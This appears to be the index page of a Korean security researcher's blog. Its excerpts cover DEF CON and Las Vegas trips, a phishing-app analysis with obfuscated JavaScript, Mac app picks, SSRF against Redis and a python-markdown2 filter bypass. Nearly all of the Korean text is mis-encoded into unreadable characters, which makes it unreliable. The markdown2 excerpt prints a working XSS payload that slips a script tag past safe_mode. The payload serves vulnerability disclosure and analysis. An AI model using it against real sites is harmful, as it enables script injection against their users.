๊ธ€

2024 DEF CON 32 ํ›„๊ธฐ (feat. ์ขŒ์„ ์—…๊ทธ๋ ˆ์ด๋“œ, ๋ธ”๋ž™๋ฑƒ์ง€)

์ด๋ฏธ์ง€
Incheon -> Las Vegas 12์‹œ๊ฐ„์˜ ๋น„ํ–‰์€ ์–ธ์ œ๋‚˜ ํ—˜๋‚œํ•œ ์—ฌ์ •์ด๋‹ค...   ๋น„ํ–‰๊ธฐ์—์„œ ํŽธํ•˜๊ฒŒ ๋ˆ„์›Œ ์ž˜ ์ˆ˜ ์žˆ๊ธฐ๋ฅผ ๋ฐ”๋ผ๋ฉฐ, ์ขŒ์„ ์—…๊ทธ๋ ˆ์ด๋“œ๋ผ๋Š” ํ–‰์šด์ด ์ฐพ์•„์˜ค๊ธธ ๊ธฐ๋‹ค๋ ค ๋ณด์ง€๋งŒ, ํ˜„์‹ค์€ ๊ทธ๋ฆฌ ๋‹ฌ๊ฐ‘์ง€ ์•Š์•˜๋‹ค. ์˜ˆ์ „์— ๋™๋ฃŒ๊ฐ€ ์šด ์ข‹๊ฒŒ ์—…๊ทธ๋ ˆ์ด๋“œ๋˜๋Š” ๋ชจ์Šต์„ ์˜†์—์„œ ์ง€์ผœ๋ณธ ์ ์€ ์žˆ์ง€๋งŒ, ๋‚˜์—๊ฒŒ ๊ทธ๋Ÿฐ ๊ธฐ์ ์€ ์ผ์–ด๋‚˜์ง€ ์•Š์•˜๋‹ค. ใ… ใ…  ๊ทธ๋Ÿฐ๋ฐ ์ด๋ฒˆ์—๋Š” ๋ญ”๊ฐ€ ๋‹ฌ๋ž๋‹ค! ํŒ€ ๋™๋ฃŒ๊ฐ€ ์˜ค๋ฒ„๋ถ€ํ‚น ๋•Œ๋ฌธ์— ์˜จ๋ผ์ธ ์ฒดํฌ์ธ์—์„œ ์ขŒ์„์„ ๊ณ ๋ฅผ ์ˆ˜ ์—†์—ˆ๋‹ค๋Š” ์†Œ์‹์„ ๋“ฃ์ž, ํ˜น์‹œ๋‚˜ ํ•˜๋Š” ๋งˆ์Œ์— ์—„์ฒญ๋‚œ ๊ธฐ๋Œ€๊ฐ์„ ํ’ˆ๊ณ  ์นด์šดํ„ฐ๋กœ ํ–ฅํ–ˆ๋‹ค.  ๋‘ ์†์„ ๋ชจ์•„ ๊ฐ„์ ˆํžˆ ๋ฐ”๋ž์ง€๋งŒ, ํ˜„์‹ค์€ ์—ฌ์ „ํžˆ ์ฐจ๊ฐ€์› ๋‹ค. ์›๋ž˜ ์˜ˆ์•ฝํ•œ ๊ทธ ์ขŒ์„, ๊ทธ ์ž๋ฆฌ๋กœ ํ™•์ •...ใ…‹ใ…‹ ๊ทธ๋ ‡๊ฒŒ ์•„์‰ฌ์šด ๋งˆ์Œ์„ ์•ˆ๊ณ  ๋ผ์šด์ง€์—์„œ ์—ด์‹ฌํžˆ ๋จน์œผ๋ฉด์„œ ์†์„ ๋‹ฌ๋žฌ๋‹ค. ๊ทธ๋Ÿฌ๋˜ ์ค‘, ํ•จ๊ป˜ ๊ฐ€๋˜ ๋™๋ฃŒ๊ฐ€ ๊ฐ‘์ž๊ธฐ ์ขŒ์„์ด ๋ณ€๊ฒฝ๋˜์—ˆ๋‹ค๋Š” ์†Œ์‹์„ ๋“ค์—ˆ๋‹ค.  ์ด๋Ÿด ์ˆ˜๊ฐ€! ์„ค๋งˆ ๋‚˜๋„?! ํ•˜๊ณ  ์•ฑ์„ ํ™•์ธํ•ด๋ณด๋Š” ์ˆœ๊ฐ„...!! ์˜ˆ~~~ ์Šน๊ธ‰ !! ๋‘๊ทผ๋‘๊ทผ ํ•˜์ด๋ณผ๊ณผ ์—ฐ์–ด ํƒ€๋ฅดํƒ€๋ฅด ํ•˜๋Š˜ ์œ„์—์„œ ์ฆ๊ธฐ๋Š” ์Šคํ…Œ์ดํฌ !? ๐Ÿฝ️ ๐Ÿจ☕ ๋น ์งˆ์ˆ˜ ์—†๋Š” ๋ผ๋ฉด ๐Ÿœใ…‹ใ…‹ใ…‹ ์ •๋ง ์—ด์‹ฌํžˆ ์ฆ๊ธฐ๋А๋ผ ์ž ์„ ๋ชป ์žค๋‹ค ใ…‹ใ…‹ใ…‹ใ…‹ใ…‹ใ…‹ DEF CON 32 CTF 1, 2์ผ ์ฐจ๋Š” ํ˜ธํ…”์—์„œ ํ–ˆ๊ณ , ๋งˆ์ง€๋ง‰ 3์ผ ์ฐจ์—๋Š” ๋“œ๋””์–ด ๋Œ€ํšŒ์žฅ์œผ๋กœ ํ–ฅํ–ˆ๋‹ค. ์Šค์ฝ”์–ด๋ณด๋“œ ๋Œ€ํšŒ์— ๋Œ€ํ•ด ํŠน๋ณ„ํžˆ ํ•  ๋ง์€ ์—†์ง€๋งŒ, ๋ญ... ๊ณต๊ฒฉํ•˜๊ณ  ๋ฐฉ์–ดํ•˜๊ณ , ๋‹ค๋“ค ์•„์‹œ์ฃ ? ใ…Žใ…Ž ์ด๋ฒˆ ๋Œ€ํšŒ๋„ ์—ฐํ•ฉํŒ€์œผ๋กœ ํ”Œ๋ ˆ์ดํ–ˆ๋Š”๋ฐ, ํ•ญ์ƒ ๊ทธ๋ ‡๋“ฏ์ด ๋›ฐ์–ด๋‚œ ํŒ€์›๋“ค ๋•๋ถ„์— ์ž๊ทน๋„ ๋งŽ์ด ๋ฐ›์•˜๋‹ค. "์ € ์‚ฌ๋žŒ๋“ค์€ ๋Œ€์ฒด ์–ด๋–ป๊ฒŒ ์ €๋ ‡๊ฒŒ ์ž˜ํ• ๊นŒ?"๋ผ๋Š” ์ƒ๊ฐ์ด ๋“ค ๋งŒํผ ๋ง์ด๋‹ค.  DEF CON 32 Closing Ceremony ํ•ญ์ƒ CTF ํ•œ๋‹ค๊ณ  ํ–‰์‚ฌ์žฅ์—๋Š” ๋ชป ๊ฐ”๋Š”๋ฐ ์ด๋Ÿฐ ํฌ๊ธฐ์˜ ํ–‰์‚ฌ์žฅ์ด 4๊ฐœ๋‚˜ ์žˆ๋‹ค๋‹ˆ...?! ๊ทธ๋ฆฌ๊ณ  ์ผ๋ฐ˜ ๋ฑƒ์ง€์™€ ๋ธ”๋ž™ ๋ฑƒ์ง€! ๊ฐœ์ธ์ ์ธ ์˜๊ฒฌ์ด์ง€๋งŒ, ์˜ฌํ•ด๋Š” ์ผ๋ฐ˜ ๋ฑƒ์ง€๊ฐ€ ๋” ์˜ˆ์œ ๊ฒƒ ๊ฐ™๋‹ค๋Š” ๊ฑด ๋‚˜๋งŒ์˜ ์ƒ๊ฐ์ผ๊นŒ…? ใ…‹ใ…‹ใ…‹ใ…‹ ์•„๋ฌดํŠผ, ๊ทธ ๋ฐ˜์ง์ด๋Š” ๋ฑƒ์ง€๋“ค์„ ๋ณด๋‹ˆ ์™ ์ง€ ๋ชจ๋ฅผ ๋ฟŒ๋“ฏํ•จ์ด ๋А๊ปด์กŒ๋‹ค. ๋งˆ์ง€๋ง‰์œผ๋กœ ๊ณตํ•ญ์œผ๋กœ ๊ฐ€๋Š” ๊ธธ, ๋ฒจ๋ผ์ง€์˜ค ํ˜ธํ…”์˜ ...

์•…์„ฑ(ํ”ผ์‹ฑ) ์•ฑ ๋ถ„์„๊ธฐ

์ด๋ฏธ์ง€
- ๋ถ„์„์€ ์˜ˆ์ „์— ํ–ˆ๋Š”๋ฐ ์‹œ๊ฐ„์ด ๋ฐ”์˜๋‹ค๋Š” ํ•‘๊ณ„๋กœ ๊ธ€์€ ์ด์ œ์„œ์•ผ ์“ฐ๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. T.T - ์•…์„ฑ์ฝ”๋“œ๋ฅผ ์ฃผ๋กœ ๋‹ค๋ฃจ์ง€ ์•Š๋‹ค๋ณด๋‹ˆ ์ž˜๋ชป๋œ ๋ถ€๋ถ„์ด ์žˆ์„ ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค. ํ•ด๋‹น ๋ถ€๋ถ„์— ๋Œ€ํ•ด ์•Œ๋ ค์ฃผ์‹œ๋ฉด ๊ฐ์‚ฌํ•˜๊ฒ ์Šต๋‹ˆ๋‹ค. # ๋ฐœ๋‹จ ์ตœ๊ทผ ๋“ค์–ด ํ”ผ์‹ฑ ๋ฌธ์ž๊ฐ€ ๋งŽ์ด ๋Š˜์–ด๋‚œ๊ฒŒ ๋ณด์ธ๋‹ค. ์ง€์ธ์—๊ฒŒ short url ์„œ๋น„์Šค๋กœ ๋ณด๋‚ด์ง„ ์ฃผ์†Œ๋ฅผ ๊ณต์œ ๋ฐ›์•„ ์ ‘์†ํ•ด๋ณด์•˜๋‹ค. ์ฒ˜์Œ ๋ถ€ํ„ฐ ํฅ๋ฏธ๋ฅผ ์ž๊ทนํ•˜๋Š” ๋‚œ๋…ํ™”๋œ JS ์ฝ”๋“œ๊ฐ€ ๋ณด์ธ๋‹ค. ... ์ฝ”๋“œ ๋งˆ์ง€๋ง‰ ๋ถ€๋ถ„์— ๋ณด๋ฉด ํ•จ์ˆ˜ ํ˜ธ์ถœ`()`๋กœ ๋๋‚œ๋‹ค. ์‹ค์ œ ๋กœ์ง์ด ํฌํ•จ๋œ ์ฝ”๋“œ๋ฅผ ์‹คํ–‰ํ•˜๊ธฐ ์œ„ํ•ด ๋งˆ์ง€๋ง‰์— ํ•จ์ˆ˜ ํ˜ธ์ถœ์„ ํ• ํ…Œ๋‹ˆ ํ•ด๋‹น ๋ถ€๋ถ„์„ ๋นผ๊ณ  ์ฝ˜์†”์—์„œ ์‹คํ–‰ํ•ด๋ณด์•˜๋‹ค. ```javascript (function anonymous( ) { var rNsMwWzBiNaSuYcTeJbHfLvZlTaRjBaMoZkUfOsFqMcGkCtRjUsKuSwHrYwVgXaSkUhKjPnFkPvDoMlQkTwJbAyDuZvV = { yCdZwGrUaDePkOsWuVyCuEpSdNfQsWaEjFeCgRaLkIt: function () { var u = navigator.userAgent, app = navigator.appVersion; return { uQnJaNmSpFjMeVbT: u.indexOf('Trident') > -1, lWtPeOsDbQnQbFiLdFpNfPaLxAzFeKvZyQzRcMlWnEpS: u.indexOf('Presto') > -1, gPxUjAsWuQnQuEaLkHyPoFjNuXpOyBhWjTdVfQbDoNyUfPgRjUwHzJiXaFeDnFwVfDpAzTyD: u.indexOf('AppleWebKit') > -1, nQzDtOzQiMiLpLpMdSwOyPhFxIeJnYiEwGrCfLjNfVgKuFiLrJuLvFqIsCuLkCfWlDcLrXvBuMsYjB: u.indexOf('Gecko') > -1 &&...

๋‚˜์˜ ์œ ์šฉํ•œ ๋งฅ ์•ฑ

์ด๋ฏธ์ง€
๋งฅ๋ถ์„ ์‚ฌ์šฉํ•˜๋ฉด์„œ ์ข‹์•˜๋˜ ์•ฑ๋“ค์„ ์ถ”ํ›„์—๋„ ๊นŒ๋จน์ง€ ์•Š๊ณ  ์‚ฌ์šฉํ•˜๊ธฐ ์œ„ํ•ด ๊ธฐ๋กํ•˜์—ฌ ๋‚จ๊ฒจ๋‘๋ ค๊ณ  ์ž‘์„ฑํ•˜๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. Last Update: 2020-05-27 - Snappy (๋ฌด๋ฃŒ) Link:  https://apps.apple.com/app/snappyapp/id512617038 ํ™”๋ฉด ์บก์ฒ˜ ๋ฐ ๊ด€๋ฆฌ ๋„๊ตฌ ๋ถ„์„ ์ค‘์— ํ™”๋ฉด์„ ์™”๋‹ค ๊ฐ”๋‹ค ํ•˜๋ฉด์„œ ๋ด์•ผ ํ•˜๋Š” ๊ฒฝ์šฐ ์•„๋ž˜ ๊ทธ๋ฆผ๊ณผ ๊ฐ™์ด ์Šคํฌ๋ฆฐ์ƒท์„ ์ฐ์œผ๋ฉด ํ•ด๋‹น ํ™”๋ฉด์— ๊ณ ์ •์ ์œผ๋กœ ๋‚˜์˜ค๊ฒŒ ํ•  ์ˆ˜ ์žˆ์–ด์„œ ๋ถ„์„ํ•œ ์ฝ”๋“œ ๋ณด๋ฉด์„œ PoC์ฝ”๋“œ ์งœ๊ฑฐ๋‚˜ ํ•  ๋•Œ ํŽธํ•˜๋‹ค. - Tunnelblick (๋ฌด๋ฃŒ) Link:  https://tunnelblick.net/downloads.html openVPN client, ๋งฅ ์‚ฌ์šฉ์ž ๋Œ€๋ถ€๋ถ„์ด ์‚ฌ์šฉํ•˜๊ธธ๋ž˜ ๋”ฐ๋ผ์„œ ์‚ฌ์šฉํ–ˆ๋Š”๋ฐ ํฌ๊ฒŒ ๋ถˆํŽธํ•œ ๋ถ€๋ถ„์€ ์—†์–ด์„œ ๊ณ„์† ์‚ฌ์šฉ ์ค‘. - Keka (๋ฌด๋ฃŒ) Link:  https://www.keka.io/ ์œˆ๋„์šฐ๋ž‘ ๋งฅ์—์„œ ์••์ถ• ๊ด€๋ จํ•ด์„œ ํŒŒ์ผ ์ œ๋ชฉ ๊นจ์ง€๋Š” ๊ฒฝ์šฐ๊ฐ€ ๋งŽ์€๋ฐ Keka ์‚ฌ์šฉํ•˜๋ฉด ์••์ถ•์ด ์ž˜ ํ’€๋ฆฐ๋‹ค. - MTMR (๋ฌด๋ฃŒ) Link:  https://mtmr.app/ Github:  https://github.com/Toxblh/MTMR ํ„ฐ์น˜๋ฐ” ์ปค์Šคํ…€ ๋งˆ์ด์ง•. Json ํ˜•ํƒœ๋กœ ์ด๋ฃจ์–ด์ง„ ์„ค์ • ํŒŒ์ผ ์ˆ˜์ •์„ ํ†ตํ•ด ์›ํ•˜๋Š” ํ„ฐ์น˜๋ฐ”๋กœ ๊พธ๋ฐ€ ์ˆ˜ ์žˆ๋‹ค. - parallels (์œ ๋ฃŒ) Link:  https://www.parallels.com/ ๊ฐ€์ƒํ™” ํ”„๋กœ๊ทธ๋žจ. ๋งฅ ์‚ฌ์šฉํ•˜๋ฉด์„œ๋„ ์€ํ–‰/์—…๋ฌด ๋“ฑ์˜ ์ด์œ ๋กœ ์œˆ๋„์šฐ ๋˜๋Š” ๋ฆฌ๋ˆ…์Šค ์‚ฌ์šฉํ•ด์•ผ ํ•ด์„œ ๊ตฌ๋งคํ•˜๊ฒŒ ๋˜์—ˆ๋‹ค. ๋ธ”๋ž™ ํ”„๋ผ์ด๋ฐ์ด ํ• ์ธ์œผ๋กœ ์‚ฌ๋ฉด ์กฐ๊ธˆ์€ ์ €๋ ดํ•˜๊ฒŒ ๊ตฌ๋งคํ•  ์ˆ˜ ์žˆ๋‹ค.

SSRF to Redis

SSRF (Server-Side Request Forgery) SSRF๋Š” ์„œ๋ฒ„์˜ ์š”์ฒญ์„ ๋ณ€์กฐํ•˜์—ฌ ์›ํ•˜๋Š” ๋ฐ์ดํ„ฐ ๋˜๋Š” ์›ํ•˜๋Š” ํƒ€๊ฒŸ์— ๋Œ€ํ•ด ์„œ๋ฒ„์˜ ์ž์›์„ ์ด์šฉํ•ด ์š”์ฒญ์„ ๋ณด๋‚ด๋Š” ๊ณต๊ฒฉ ๋ฐฉ๋ฒ•์ž…๋‹ˆ๋‹ค. ๋‹ค์ˆ˜์˜ ๋งˆ์ดํฌ๋กœ ์„œ๋น„์Šค๋กœ ์ด๋ฃจ์–ด์ง€๋Š” ๋ชจ๋˜ ์Šคํƒ ๋˜๋Š” ๋‹ค๋ฅธ ์„œ๋น„์Šค์™€ ์ƒํ˜ธ์ž‘์šฉํ•˜๋Š” ํ˜•ํƒœ์—์„œ ๋‹ค๋ฅธ ์„œ๋น„์Šค์— ์ ‘๊ทผํ•˜์—ฌ ์ทจ์•ฝ์ ์„ ์œ ๋ฐœํ•˜๋Š” SSRF์ทจ์•ฝ์ ์˜ ๊ฐ€์น˜๋Š” ์ฆ๊ฐ€ํ•˜๊ฒŒ ๋˜์—ˆ์Šต๋‹ˆ๋‹ค. Redis Key-Value ๋ฐ์ดํ„ฐ ๋ชจ๋ธ์„ ๊ฐ€์ง„ NoSQL ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค์ž…๋‹ˆ๋‹ค. ๋ฐ์ดํ„ฐ๋ฅผ ๋ฉ”๋ชจ๋ฆฌ์— ์ €์žฅํ•˜๋Š” ์ธ๋ฉ”๋ชจ๋ฆฌ ๋ฐ์ดํ„ฐ๋ฒ ์ด์Šค๋กœ read/write ์†๋„๊ฐ€ ๋น ๋ฅด๋‹ค๋Š” ์žฅ์ ์œผ๋กœ ๋Œ€์ค‘์ ์œผ๋กœ ๋งŽ์ด ์‚ฌ์šฉ๋˜๊ณ  ์žˆ์Šต๋‹ˆ๋‹ค. Redis๋Š” ์™œ ํ•ด์ปค์˜ ํƒ€๊ฒŸ์ด ๋˜์—ˆ๋‚˜? Redis๋Š” SSRF์ทจ์•ฝ์  ๋ฐœ์ƒ ์‹œ ์ฃผ๋กœ ํƒ€๊ฒŸ์ด ๋˜๋Š” ์„œ๋น„์Šค ์ค‘ ํ•˜๋‚˜์ž…๋‹ˆ๋‹ค. ์ด์— ๋Œ€ํ•œ ์ด์œ ๋Š” ์•„๋ž˜์™€ ๊ฐ™๋‹ค๊ณ  ์ƒ๊ฐ๋ฉ๋‹ˆ๋‹ค. - ์ธ์ฆ ์ฒด๊ณ„ ๊ธฐ๋ณธ์ ์œผ๋กœ Redis๋Š” ์ธ์ฆ ์ฒด๊ณ„๊ฐ€ ์—†์œผ๋ฉฐ, bind 127.0.0.1, port 6379๋กœ ์„œ๋น„์Šค๊ฐ€ ์„ค์ •๋ฉ๋‹ˆ๋‹ค.  redis.conf์˜ ๋‚ด์šฉ ์ค‘ port์™€ bind์— ๋Œ€ํ•œ ๋‚ด์šฉ์ž…๋‹ˆ๋‹ค. ```apache # Accept connections on the specified port, default is 6379. # If port 0 is specified Redis will not listen on a TCP socket. port 6379 ... # By default Redis listens for connections from all the network interfaces # available on the server. It is possible to listen to just one or multiple # interfaces using the "bind" configuration directive, followed by one or # more IP addresses. # # Examples: # # bind 192.168.1.100 10.0.0.1 bind 12...

[python-markdown2] safe_mode Filter bypass ๋ถ„์„๊ธ€

์ด๋ฏธ์ง€
๊ฐœ์š” * ์ž‘์„ฑ์ผ ๊ธฐ์ค€ version: 2.3.8 ( https://github.com/trentm/python-markdown2/tree/4d2fc792abd7fbf8ddec937812857f13fded61cf ) CTFํ•˜๋‹ค๊ฐ€ markdown2 ๋ชจ๋“ˆ์„ ์‚ฌ์šฉํ•˜๊ธธ๋ž˜ ํ•ด๋‹น ๋ชจ๋“ˆ ์ฐพ์•„๋ณด๋‹ค๊ฐ€ ์•„๋ž˜ ์ด์Šˆ๋ฅผ ๋ฐœ๊ฒฌํ•˜์˜€๋‹ค. https://github.com/trentm/python-markdown2/issues/341 Filter Bypass ????!! - Expected Result ```python >>> import markdown2 >>> markdown2.markdown("[<script>alert(1)</script>]()", safe_mode=True) '<p><a href="#">[HTML_REMOVED]alert(1)[HTML_REMOVED]</a></p>\n' ``` - Issue Payload ```python >>> import markdown2 >>> markdown2.markdown('<http://g<!s://q?<!-<[<script>alert(1);/\*](http://g)->a><http://g<!s://g.c?<!-<[a\\*/</script>alert(1);/*](http://g)->a>', safe_mode=True) '<p><http://g<!s://q?<!-&lt;<a href="http://g"><script>alert(1);/*</a>->a><http://g<!s://g.c?<!-&lt;<a href=...

2019 ๋ฏธ๊ตญ ๋ฐฉ๋ฌธ๊ธฐ

์ด๋ฏธ์ง€
Day 1 ( Incheon -> Las Vegas) ๋น„ํ–‰๊ธฐ ์ถœ๋ฐœ ์ „ ์ €๋… 9์‹œ์— ์ถœ๋ฐœํ•ด์„œ 12์‹œ๊ฐ„ ์ฏค ๊ฑธ๋ ค์„œ ๋ผ์Šค๋ฒ ๊ฐ€์Šค(LAS)์— ๋„์ฐฉํ–ˆ๋‹ค. (๋น„ํ–‰๊ธฐ ์•ˆ์—์„œ ์ฃฝ๋Š”์ค„ ์•Œ์•˜๋‹ค. ใ…ก.ใ…ก) ๋„ˆ๋ฌด ํ”ผ๊ณคํ•ด์„œ ๋„์ฐฉํ•˜์ž๋งˆ์ž ๋ฐ”๋กœ ํ˜ธํ…”๋กœ๊ฐ”๋‹ค. ์ด๋ฒˆ์—๋Š” Bally's Hotel๋กœ ์˜ˆ์•ฝ์„ ํ–ˆ๋‹ค. Bally's Hotel Room ์žฅ์‹œ๊ฐ„ ๋น„ํ–‰ + ์‹œ์ฐจ๋กœ ์ธํ•ด ํ”ผ๊ณคํ•ด์„œ ๋ฐฅ๋จน๊ณ  ๋ฐ”๋กœ ์žค๋‹ค. ํ˜ธํ…” ์ฃผ๋ณ€ ์‹๋‹น์—์„œ ๋จน์€๊ฑด๋ฐ ๋„ˆ๋ฌด ํ”ผ๊ณคํ•ด์„œ ๋ง›๋„ ๊ธฐ์–ต์ด ์•ˆ๋‚œ๋‹ค.... Day 2 ๋ผ์Šค๋ฒ ๊ฐ€์Šค์— ๋จธ๋ฌด๋Š” ๊ธฐ๊ฐ„์ด ์งง์•„์„œ ์กฐ๊ธˆ ๋ฌด๋ฆฌํ•œ ์ผ์ •์œผ๋กœ ๊ทธ๋žœ๋“œ ์บ๋‹ˆ์–ธ ๋ฐค๋„๊นจ๋น„ ํˆฌ์–ด๋ฅผ ์‹ ์ฒญํ–ˆ๋‹ค. ์ƒˆ๋ฒฝ์— ์ถœ๋ฐœํ•˜๋Š” ์ผ์ •์ด๊ณ  ๊ทธ๋žœ๋“œ ์บ๋‹ˆ์–ธ๊นŒ์ง€ ๊ฐ€๋Š” ์ฐจ์—์„œ ์ž๋ฉด๋˜๊ฒ ์ง€ ํ•˜๋ฉด์„œ ์‹ ์ฒญํ–ˆ๋Š”๋ฐ ์ž๋„ ์ž๋„ ๋„ˆ๋ฌด ํž˜๋“ค์—ˆ๋‹ค. I LOVE LASVEGAS ! ์‚ฌ์ง„์œผ๋กœ ๋‹ค ๋‹ด์„์ˆ˜ ์—†์–ด์„œ ์•„์‰ฝ๋‹ค. ใ… .ใ…  ๊ฐ€๋Š” ๊ธธ ์ค‘๊ฐ„ ์ค‘๊ฐ„์— ๋ฉˆ์ถฐ์„œ ์‚ฌ์ง„์„ ์ฐ์—ˆ๋‹ค. ์›๋ž˜ ๊ฐ™์ด ๊ฐ€๋Š” ์ผ์ •์„ ์‹ ์ฒญํ•œ๊ฒŒ ๋‚˜ ํฌํ•จ 6๋ช…์ด์˜€๋Š”๋ฐ ๊ฐ€๋Š” ํฌ์ธํŠธ๋งˆ๋‹ค ์•„๋Š” ์‚ฌ๋žŒ์„ ๋งŒ๋‚˜์„œ ์žฌ๋ฏธ์žˆ๊ฒŒ ๋†€์•˜๋‹ค. ๊ฑฐ์˜ ๋‹ค ๋„์ฐฉํ•ด์„œ ๋ฐฅ์„ ๋จน์—ˆ๋‹ค. ๊ทธ์ฏค ํ•ด๊ฐ€ ๋œจ๊ธฐ ์‹œ์ž‘ํ–ˆ๋‹ค. WoW ~! WoW 22 ํ•ด๊ฐ€ ๋œจ๋‹ˆ ํ’๊ฒฝ๋“ค์ด ๋ณด์ด๊ธฐ ์‹œ์ž‘ํ–ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  ์•คํ…”๋กœํ”„ ์บ๋‹ˆ์–ธ์™€ ํ™€์Šค์Šˆ ๋ฐด๋“œ์— ๊ฐ”์—ˆ๋‹ค. ํ•ด๊ฐ€ ๋œฐ๋•Œ ํ’๊ฒฝ์€ ์ข‹์•˜๋Š”๋ฐ, ์‚ฌ๋ง‰์ด๋ผ๋Š”๊ฑธ ๋ชธ์†Œ ๋А๋‚„ ์ˆ˜ ์žˆ์—ˆ๋‹ค. ๋ฅ๊ณ  ํ•ด๊ฐ€ ๋„ˆ๋ฌด ๋œจ๊ฑฐ์› ๋‹ค. ๊ทธ๋ž˜์„œ ๊ทธ๋žœ๋“œ ์บ๋‹ˆ์–ธ์€ ํ•œ๋ฒˆ ๊ฐ”๋‹ค์˜ค๋ฉด ๊ธฐ๊ฐ€ ๋‹ค ๋น ์ง€๋Š”๊ฑฐ ๊ฐ™๋‹ค.  ๊ทธ๋ ‡๊ฒŒ ํˆฌ์–ดํ•˜๊ณ  ํ˜ธํ…”๋กœ ๋Œ์•„๊ฐ€๋Š” ๊ธธ์— ์ธ์•ค์•„์›ƒ๋ฒ„๊ฑฐ ๋จน๊ณ  ๋ฐ”๋กœ ์žค๋‹ค. Day 3 ์˜ค์ „์—๋Š” ๋ญํ–ˆ๋Š”์ง€ ์ •ํ™•ํžˆ ๊ธฐ์–ต์ด ์•ˆ๋‚œ๋‹ค. ใ…ก.ใ…ก ๊ทธ๋Ÿฌ๋‹ค๊ฐ€ ํšŒ์‚ฌ ์‚ฌ๋žŒ๋“ค๊ณผ paris hotel์— ์žˆ๋Š” " Mon Ami Gabi " ๋ ˆ์Šคํ† ๋ž‘์—์„œ ์ €๋…์„ ๋จน์—ˆ๋‹ค. ์ด๋•Œ๋Š” ๋ฌด์Šจ ์ƒ๊ฐ์ด์˜€๋Š”์ง€ ๋ชจ๋ฅด๊ฒ ์ง€๋งŒ ์ƒˆ๋กœ์šด๊ฑธ ๋จน๊ฒ ๋‹ค๊ณ  ์ƒ์„  ์š”๋ฆฌ๋ฅผ ์‹œ์ผฐ๋‹ค. ์—ฐ์–ด ์˜€๋˜๊ฑธ๋กœ ๊ธฐ์–ตํ•˜๋Š”๋ฐ ๋„ˆ๋ฌด ์งœ์„œ ๋‹ค๋จน์ง€ ๋ชปํ–ˆ๋‹ค. ใ… ใ…  ๊ทธ๋ฆฌ๊ณ  ๋ฒจ๋ผ์ง€์˜ค...